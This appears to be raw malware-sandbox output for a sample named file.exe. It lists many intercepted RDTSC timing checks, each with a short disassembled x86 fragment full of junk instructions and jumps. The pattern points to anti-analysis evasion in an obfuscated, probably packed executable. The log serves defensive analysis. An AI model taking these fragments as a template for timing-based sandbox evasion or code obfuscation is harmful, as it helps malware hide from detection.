                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C706F1 second address: 4C706FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 test eax, eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop eax 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C706FF second address: 4C70711 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ecx, ebx 0x00000008 popad 0x00000009 je 00007F69DBB56104h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70847 second address: 4C7084B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7084B second address: 4C7084F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7084F second address: 4C70855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70855 second address: 4C70883 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6969412EB8h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70883 second address: 4C70889 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70889 second address: 4C7089A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6969412EADh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7089A second address: 4C7089E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7089E second address: 4C708BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F6969412EADh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C708BB second address: 4C708C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2008F second address: 4C200F0 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6969412EAAh 0x00000008 sub cx, 17B8h 0x0000000d jmp 00007F6969412EABh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 and esp, FFFFFFF8h 0x00000019 pushad 0x0000001a mov dl, ah 0x0000001c mov dx, 0194h 0x00000020 popad 0x00000021 push ebp 0x00000022 jmp 00007F6969412EB8h 0x00000027 mov dword ptr [esp], ecx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F6969412EB7h 0x00000031 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C200F0 second address: 4C200F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C200F6 second address: 4C200FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C200FA second address: 4C201AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007F6968D5473Ch 0x0000000e mov dword ptr [esp], ebx 0x00000011 jmp 00007F6968D54740h 0x00000016 mov ebx, dword ptr [ebp+10h] 0x00000019 pushad 0x0000001a mov di, ax 0x0000001d mov dx, ax 0x00000020 popad 0x00000021 xchg eax, esi 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F6968D54742h 0x00000029 jmp 00007F6968D54745h 0x0000002e popfd 0x0000002f movzx esi, di 0x00000032 popad 0x00000033 push eax 0x00000034 pushad 0x00000035 mov ax, AD4Fh 0x00000039 mov dl, al 0x0000003b popad 0x0000003c xchg eax, esi 0x0000003d pushad 0x0000003e call 00007F6968D5473Dh 0x00000043 pushfd 0x00000044 jmp 00007F6968D54740h 0x00000049 and ax, 9D28h 0x0000004e jmp 00007F6968D5473Bh 0x00000053 popfd 0x00000054 pop ecx 0x00000055 mov si, dx 0x00000058 popad 0x00000059 mov esi, dword ptr [ebp+08h] 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F6968D5473Dh 0x00000065 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C201AF second address: 4C201C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C201C4 second address: 4C201D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 movsx edi, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C201D7 second address: 4C201DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C201DC second address: 4C201FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54746h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C201FD second address: 4C20201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20201 second address: 4C2021D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54748h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2021D second address: 4C202FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F6969412EB6h 0x0000000f test esi, esi 0x00000011 jmp 00007F6969412EB0h 0x00000016 je 00007F69DBBA1266h 0x0000001c pushad 0x0000001d movzx ecx, di 0x00000020 mov dx, F94Eh 0x00000024 popad 0x00000025 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002c jmp 00007F6969412EB5h 0x00000031 je 00007F69DBBA1251h 0x00000037 pushad 0x00000038 mov si, 93F3h 0x0000003c pushfd 0x0000003d jmp 00007F6969412EB8h 0x00000042 adc esi, 2856D8F8h 0x00000048 jmp 00007F6969412EABh 0x0000004d popfd 0x0000004e popad 0x0000004f mov edx, dword ptr [esi+44h] 0x00000052 pushad 0x00000053 jmp 00007F6969412EB4h 0x00000058 jmp 00007F6969412EB2h 0x0000005d popad 0x0000005e or edx, dword ptr [ebp+0Ch] 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F6969412EB7h 0x00000068 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A006A8 second address: 2A006AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A006AE second address: 2A006EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, ax 0x00000006 call 00007F6969412EAEh 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebp, esp 0x00000011 jmp 00007F6969412EB1h 0x00000016 and esp, FFFFFFF8h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F6969412EADh 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A006EB second address: 2A00707 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A00707 second address: 2A0070D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A0070D second address: 2A007AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54747h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F6968D54749h 0x00000011 xchg eax, ebx 0x00000012 jmp 00007F6968D5473Eh 0x00000017 xchg eax, esi 0x00000018 jmp 00007F6968D54740h 0x0000001d push eax 0x0000001e jmp 00007F6968D5473Bh 0x00000023 xchg eax, esi 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F6968D54744h 0x0000002b add ah, 00000048h 0x0000002e jmp 00007F6968D5473Bh 0x00000033 popfd 0x00000034 mov ebx, ecx 0x00000036 popad 0x00000037 mov esi, dword ptr [ebp+08h] 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F6968D54741h 0x00000041 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A007AF second address: 2A00811 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6969412EB7h 0x00000009 sbb ax, 94EEh 0x0000000e jmp 00007F6969412EB9h 0x00000013 popfd 0x00000014 call 00007F6969412EB0h 0x00000019 pop esi 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ebx, 00000000h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F6969412EADh 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A00811 second address: 2A0087B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c call 00007F6968D5473Ch 0x00000011 call 00007F6968D54742h 0x00000016 pop eax 0x00000017 pop edx 0x00000018 call 00007F6968D54740h 0x0000001d pop edi 0x0000001e popad 0x0000001f je 00007F69DD6FA269h 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F6968D54746h 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A0087B second address: 2A0088A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A0088A second address: 2A00890 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A00890 second address: 2A008F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000012 pushad 0x00000013 mov bx, si 0x00000016 mov ch, 85h 0x00000018 popad 0x00000019 mov ecx, esi 0x0000001b jmp 00007F6969412EB3h 0x00000020 je 00007F69DDDB8985h 0x00000026 jmp 00007F6969412EB6h 0x0000002b test byte ptr [77436968h], 00000002h 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F6969412EAAh 0x0000003b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A008F5 second address: 2A008F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A008F9 second address: 2A008FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A008FF second address: 2A00905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A00905 second address: 2A00909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A00909 second address: 2A00947 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F69DD6FA1DBh 0x0000000e jmp 00007F6968D54744h 0x00000013 mov edx, dword ptr [ebp+0Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F6968D54747h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A00947 second address: 2A00968 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6969412EB3h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A00968 second address: 2A0096E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A0096E second address: 2A00986 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A00986 second address: 2A0098A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A0098A second address: 2A00990 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A00990 second address: 2A009A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D5473Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A009A8 second address: 2A009AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A009AC second address: 2A009B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A009B0 second address: 2A009B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A009B6 second address: 2A009BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A009BC second address: 2A00A2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007F6969412EB8h 0x0000000e push eax 0x0000000f jmp 00007F6969412EABh 0x00000014 xchg eax, ebx 0x00000015 jmp 00007F6969412EB6h 0x0000001a push dword ptr [ebp+14h] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F6969412EADh 0x00000026 or cx, 7DB6h 0x0000002b jmp 00007F6969412EB1h 0x00000030 popfd 0x00000031 movzx eax, dx 0x00000034 popad 0x00000035 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A00A2F second address: 2A00A79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 6C9Fh 0x00000007 pushfd 0x00000008 jmp 00007F6968D54744h 0x0000000d sub ax, 8008h 0x00000012 jmp 00007F6968D5473Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push dword ptr [ebp+10h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F6968D54745h 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A00A98 second address: 2A00AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, di 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A00AA0 second address: 2A00AE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6968D54740h 0x00000009 xor cx, 9FF8h 0x0000000e jmp 00007F6968D5473Bh 0x00000013 popfd 0x00000014 jmp 00007F6968D54748h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pop esi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A00AE6 second address: 2A00AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, di 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A00AEE second address: 2A00AFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6968D5473Bh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A00AFD second address: 2A00B01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A00B01 second address: 2A00B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F6968D5473Eh 0x00000012 and cx, 0BE8h 0x00000017 jmp 00007F6968D5473Bh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F6968D54748h 0x00000023 or ax, 9E48h 0x00000028 jmp 00007F6968D5473Bh 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A00B58 second address: 2A00B5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20A69 second address: 4C20A6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20A6F second address: 4C20A73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20A73 second address: 4C20A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6968D54740h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20A90 second address: 4C20A94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20A94 second address: 4C20A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C909BF second address: 4C909D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C909D2 second address: 4C90A21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 01E17F5Ah 0x00000008 jmp 00007F6968D5473Bh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 mov bl, cl 0x00000015 mov si, di 0x00000018 popad 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F6968D54744h 0x00000023 xor esi, 0C7B73F8h 0x00000029 jmp 00007F6968D5473Bh 0x0000002e popfd 0x0000002f mov si, C52Fh 0x00000033 popad 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90799 second address: 4C907B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C907B9 second address: 4C907BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C3001B second address: 4C3003F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C3003F second address: 4C30045 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C30045 second address: 4C3005A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6969412EB1h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C3005A second address: 4C30078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F6968D5473Ch 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov al, 95h 0x00000012 push eax 0x00000013 push edx 0x00000014 mov cx, di 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90C45 second address: 4C90C49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90C49 second address: 4C90C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90C4F second address: 4C90C55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90C55 second address: 4C90CA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D5473Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d call 00007F6968D5473Eh 0x00000012 jmp 00007F6968D54742h 0x00000017 pop eax 0x00000018 mov bx, 6D36h 0x0000001c popad 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F6968D54743h 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90CA7 second address: 4C90CF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F6969412EAEh 0x0000000f mov ebp, esp 0x00000011 jmp 00007F6969412EB0h 0x00000016 push dword ptr [ebp+0Ch] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F6969412EAAh 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90CF6 second address: 4C90D05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D5473Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90D05 second address: 4C90D34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6969412EADh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90D34 second address: 4C90D5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push BF632AD1h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6968D5473Ah 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90D5A second address: 4C90D60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90D60 second address: 4C90D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90D64 second address: 4C90D68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
